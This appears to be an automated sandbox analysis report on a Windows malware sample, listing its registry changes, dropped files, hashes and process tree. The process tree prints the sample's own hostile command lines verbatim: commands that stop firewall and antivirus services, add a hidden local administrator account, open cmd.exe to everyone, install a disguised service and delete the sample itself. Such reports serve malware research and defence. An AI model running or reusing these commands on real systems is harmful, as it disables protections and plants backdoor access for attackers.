Analysis Overview
SHA256
33a37adad6fb9555f45400fcb164140bef02b07fdc8c964ce5b6fc8bc22b7257
Threat Level: Likely malicious
The file 128394c4fa5db44d001d415665c98edf_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Grants admin privileges
Event Triggered Execution: Image File Execution Options Injection
Executes dropped EXE
Adds Run key to start application
Modifies WinLogon
Hide Artifacts: Hidden Users
Drops file in System32 directory
Drops file in Windows directory
Unsigned PE
Suspicious use of WriteProcessMemory
Runs net.exe
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-26 15:42
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-26 15:42
Reported
2024-06-26 15:44
Platform
win7-20240611-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Grants admin privileges
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe\Debugger = "SoundMan.exe" | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SoundMan.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe = "C:\\Windows\\system32\\ctfmon.exe" | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1 = "0" | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\interne.exe | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| File created | C:\Windows\SysWOW64\ttjj6.ini | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1 = "0" | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SoundMan.exe | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| File created | C:\Windows\1.inf | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\1.inf | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.app.log | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\runonce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\runonce.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Windows\SoundMan.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe"
C:\Windows\SysWOW64\cacls.exe
cacls.exe C:\Windows\system32\cmd.exe /e /t /g everyone:F
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc start= disabled&net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop "Norton AntiVirus Server"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net user new1 12369 /add&net user new1 12369&net user new1 /active:yes&net localgroup administrators new1 /add
C:\Windows\SysWOW64\cmd.exe
cmd /c echo [Version]>%windir%\1.inf&echo Signature="$WINDOWS NT$">>%windir%\1.inf&echo [DefaultInstall.Services]>>%windir%\1.inf&echo AddService=helpsvc,,My_AddService_Name>>%windir%\1.inf&echo [My_AddService_Name]>>%windir%\1.inf&echo DisplayName=Help and Support>>%windir%\1.inf&echo Description=启用在此计算机上运行帮助和支持中心。如果停止服务,帮助和支持中心将不可用。如果禁用服务,任何直接依赖于此服务的服务将无法启动。>>%windir%\1.inf&echo ServiceType=0x10>>%windir%\1.inf&echo StartType=2 >>%windir%\1.inf&echo ServiceBinary=%11%\interne.exe>>%windir%\1.inf&echo ErrorControl=0 >>%windir%\1.inf&rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %windir%\1.inf&del %windir%\1.inf&exit
C:\Windows\SysWOW64\net.exe
net user new1 12369 /add
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\Windows\1.inf
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user new1 12369 /add
C:\Windows\SysWOW64\net.exe
net user new1 12369
C:\Windows\SysWOW64\runonce.exe
"C:\Windows\system32\runonce.exe" -r
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user new1 12369
C:\Windows\SysWOW64\net.exe
net user new1 /active:yes
C:\Windows\SysWOW64\grpconv.exe
"C:\Windows\System32\grpconv.exe" -o
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user new1 /active:yes
C:\Windows\SysWOW64\net.exe
net localgroup administrators new1 /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administrators new1 /add
C:\Windows\SoundMan.exe
C:\Windows\SoundMan.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c echo ping 127.1 -n 3 >nul 2>nul >c:\2.bat&echo del C:\Windows\system32\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe>>c:\2.bat&echo del c:\2.bat>>c:\2.bat&c:\2.bat
C:\Windows\SysWOW64\PING.EXE
ping 127.1 -n 3
Network
Files
memory/1716-0-0x0000000000400000-0x0000000000437000-memory.dmp
C:\Windows\1.inf
| MD5 | 8a3cdcae5040a0e9ffda840903292d09 |
| SHA1 | 968fb550eec0f3726c1b828a01d0496429502f7c |
| SHA256 | 8b5ac0c6629193fec6b4052aa330fe309679a9d248d150cc68e291a54a8a77d9 |
| SHA512 | 669fdfc661c94be7e6bec7d6fbd2307d7494b4f5c26840ac99d1580ffeaf4b71e96798e5e0d223ebdc676c047e7a3aa3695711613098ded0b942796089c95f3a |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\SoundMan.exe
| MD5 | 1063293cd7bcdafef5dab258a6c55eb6 |
| SHA1 | 89a06e65acb702df0cb96ef513b042fa01c22ec9 |
| SHA256 | c99121e7f999dd4f12583929c3bd6b2f7481b58f42ef7b2cc0e2540c09b80218 |
| SHA512 | 61c8e730bc9ac5a647ad11500a135028702ac3e9b3c8882e006760d48d662fc736d93ad2e876d050377bf987915998ffbdfa18f8c48a40942903b49856a91f49 |
memory/1716-34-0x0000000000400000-0x0000000000437000-memory.dmp
memory/1716-37-0x0000000000400000-0x0000000000437000-memory.dmp
C:\2.bat
| MD5 | 6410f1dd47e0842c546c3fca681f6a38 |
| SHA1 | bc9e0e091b79b26c389b5c99c9896fd3d73a9bf2 |
| SHA256 | 4794dcea80d8427d282d6eea007dbf0572b3b2b27dbfe7d7727e5a46eb945a92 |
| SHA512 | 932a4a1f8ff336952bc4c4250af20d34b6bb0cca86f6e34e1eff019294c7cea1c198fa56d7ae54b6fb5c253489173b7346c2e37a233960d93e523f91aea68e47 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-26 15:42
Reported
2024-06-26 15:44
Platform
win10v2004-20240508-en
Max time kernel
125s
Max time network
126s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\128394c4fa5db44d001d415665c98edf_JaffaCakes118.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1280,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=4452 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
memory/4664-0-0x0000000000400000-0x0000000000437000-memory.dmp